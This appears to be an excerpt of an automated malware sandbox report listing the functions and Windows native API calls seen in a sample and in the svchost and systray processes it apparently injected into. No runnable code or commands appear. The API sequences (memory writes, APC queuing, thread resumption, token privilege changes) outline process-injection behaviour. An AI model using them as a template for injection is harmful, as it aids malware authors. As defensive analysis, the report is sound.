Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692C60 NtCreateKey,LdrInitializeThunk,	4_2_04692C60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_04692C70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_04692CA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_04692D30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_04692D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_04692DF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692DD0 NtDelayExecution,LdrInitializeThunk,	4_2_04692DD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_04692EE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_04692E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692F30 NtCreateSection,LdrInitializeThunk,	4_2_04692F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692FE0 NtCreateFile,LdrInitializeThunk,	4_2_04692FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692FB0 NtResumeThread,LdrInitializeThunk,	4_2_04692FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692AF0 NtWriteFile,LdrInitializeThunk,	4_2_04692AF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692AD0 NtReadFile,LdrInitializeThunk,	4_2_04692AD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692B60 NtClose,LdrInitializeThunk,	4_2_04692B60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_04692BE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_04692BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_04692BA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046935C0 NtCreateMutant,LdrInitializeThunk,	4_2_046935C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046939B0 NtGetContextThread,LdrInitializeThunk,	4_2_046939B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692C00 NtQueryInformationProcess,	4_2_04692C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692CF0 NtOpenProcess,	4_2_04692CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692CC0 NtQueryVirtualMemory,	4_2_04692CC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692D00 NtSetInformationFile,	4_2_04692D00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692DB0 NtEnumerateKey,	4_2_04692DB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692E30 NtWriteVirtualMemory,	4_2_04692E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692EA0 NtAdjustPrivilegesToken,	4_2_04692EA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692F60 NtCreateProcessEx,	4_2_04692F60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692FA0 NtQuerySection,	4_2_04692FA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692F90 NtProtectVirtualMemory,	4_2_04692F90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692AB0 NtWaitForSingleObject,	4_2_04692AB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04692B80 NtQueryInformationFile,	4_2_04692B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04693010 NtOpenDirectoryObject,	4_2_04693010
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04693090 NtSetValueKey,	4_2_04693090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04693D70 NtOpenThread,	4_2_04693D70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04693D10 NtOpenProcessToken,	4_2_04693D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02399340 NtReadFile,	4_2_02399340
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_023991D0 NtCreateFile,	4_2_023991D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02399640 NtAllocateVirtualMemory,	4_2_02399640
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_02399430 NtDeleteFile,	4_2_02399430
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_023994D0 NtClose,	4_2_023994D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0437F96D NtClose,	4_2_0437F96D

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00431BE8

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00446313

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe

Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

0_2_004333BE

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004096A0	0_2_004096A0
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0042200C	0_2_0042200C
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0041A217	0_2_0041A217
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00412216	0_2_00412216
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0042435D	0_2_0042435D
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004033C0	0_2_004033C0
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044F430	0_2_0044F430
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004125E8	0_2_004125E8
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044663B	0_2_0044663B
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00413801	0_2_00413801
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0042096F	0_2_0042096F
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004129D0	0_2_004129D0
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004119E3	0_2_004119E3
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0041C9AE	0_2_0041C9AE
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0047EA6F	0_2_0047EA6F
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0040FA10	0_2_0040FA10
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044EB5F	0_2_0044EB5F
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00423C81	0_2_00423C81
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00411E78	0_2_00411E78
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00442E0C	0_2_00442E0C
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00420EC0	0_2_00420EC0
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044CF17	0_2_0044CF17
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00444FD2	0_2_00444FD2
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_04343620	0_2_04343620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418843	2_2_00418843
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404865	2_2_00404865
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041000B	2_2_0041000B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410013	2_2_00410013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401140	2_2_00401140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029A0	2_2_004029A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403240	2_2_00403240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416A43	2_2_00416A43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401260	2_2_00401260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410233	2_2_00410233
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E233	2_2_0040E233
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416A3F	2_2_00416A3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E37A	2_2_0040E37A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E383	2_2_0040E383
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401CDF	2_2_00401CDF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401CE0	2_2_00401CE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402500	2_2_00402500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401D19	2_2_00401D19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E70	2_2_00401E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026F6	2_2_004026F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402700	2_2_00402700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EFC3	2_2_0042EFC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E2F30	2_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344CFE0	2_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD2	2_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD5	2_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04712446	4_2_04712446
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04704420	4_2_04704420
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0470E4F6	4_2_0470E4F6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04660535	4_2_04660535
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04720591	4_2_04720591
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0467C6E0	4_2_0467C6E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04660770	4_2_04660770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04684750	4_2_04684750
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0465C7C0	4_2_0465C7C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0466807D	4_2_0466807D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046F2000	4_2_046F2000
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046E8158	4_2_046E8158
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04650100	4_2_04650100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046FA118	4_2_046FA118
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047181CC	4_2_047181CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047141A2	4_2_047141A2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047201AA	4_2_047201AA
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04700274	4_2_04700274
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046E02C0	4_2_046E02C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471A352	4_2_0471A352
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047203E6	4_2_047203E6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0466E3F0	4_2_0466E3F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04660C00	4_2_04660C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04650CF2	4_2_04650CF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04700CB5	4_2_04700CB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0466AD00	4_2_0466AD00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046FCD1F	4_2_046FCD1F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0465ADE0	4_2_0465ADE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04678DBF	4_2_04678DBF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04660E59	4_2_04660E59
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471EE26	4_2_0471EE26
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471EEDB	4_2_0471EEDB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471CE93	4_2_0471CE93
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04672E90	4_2_04672E90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046D4F40	4_2_046D4F40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04702F30	4_2_04702F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046A2F28	4_2_046A2F28
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04680F30	4_2_04680F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0466CFE0	4_2_0466CFE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04652FC8	4_2_04652FC8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046DEFA0	4_2_046DEFA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04662840	4_2_04662840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0466A840	4_2_0466A840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0468E8F0	4_2_0468E8F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046468B8	4_2_046468B8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04676962	4_2_04676962
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046629A0	4_2_046629A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0472A9A6	4_2_0472A9A6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0465EA80	4_2_0465EA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471AB40	4_2_0471AB40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04716BD7	4_2_04716BD7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04651460	4_2_04651460
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471F43F	4_2_0471F43F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04717571	4_2_04717571
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047295C3	4_2_047295C3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046FD5B0	4_2_046FD5B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046A5630	4_2_046A5630
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047116CC	4_2_047116CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471F7B0	4_2_0471F7B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471F0E0	4_2_0471F0E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047170E9	4_2_047170E9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046670C0	4_2_046670C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0470F0CC	4_2_0470F0CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0469516C	4_2_0469516C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0464F172	4_2_0464F172
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0472B16B	4_2_0472B16B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0466B1B0	4_2_0466B1B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_047012ED	4_2_047012ED
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0467B2C0	4_2_0467B2C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046652A0	4_2_046652A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0464D34C	4_2_0464D34C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471132D	4_2_0471132D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046A739A	4_2_046A739A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046D9C32	4_2_046D9C32
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471FCF2	4_2_0471FCF2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04717D73	4_2_04717D73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04663D40	4_2_04663D40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04711D5A	4_2_04711D5A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0467FDC0	4_2_0467FDC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04669EB0	4_2_04669EB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471FF09	4_2_0471FF09
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04623FD2	4_2_04623FD2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04623FD5	4_2_04623FD5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471FFB1	4_2_0471FFB1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04661F92	4_2_04661F92
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046CD800	4_2_046CD800
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046638E0	4_2_046638E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04669950	4_2_04669950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0467B950	4_2_0467B950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046F5910	4_2_046F5910
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046D3A6C	4_2_046D3A6C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04717A46	4_2_04717A46
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471FA49	4_2_0471FA49
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0470DAC6	4_2_0470DAC6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046FDAAC	4_2_046FDAAC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046A5AA0	4_2_046A5AA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_04701AA3	4_2_04701AA3
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0471FB76	4_2_0471FB76
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0469DBF9	4_2_0469DBF9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_046D5BF0	4_2_046D5BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0467FB80	4_2_0467FB80
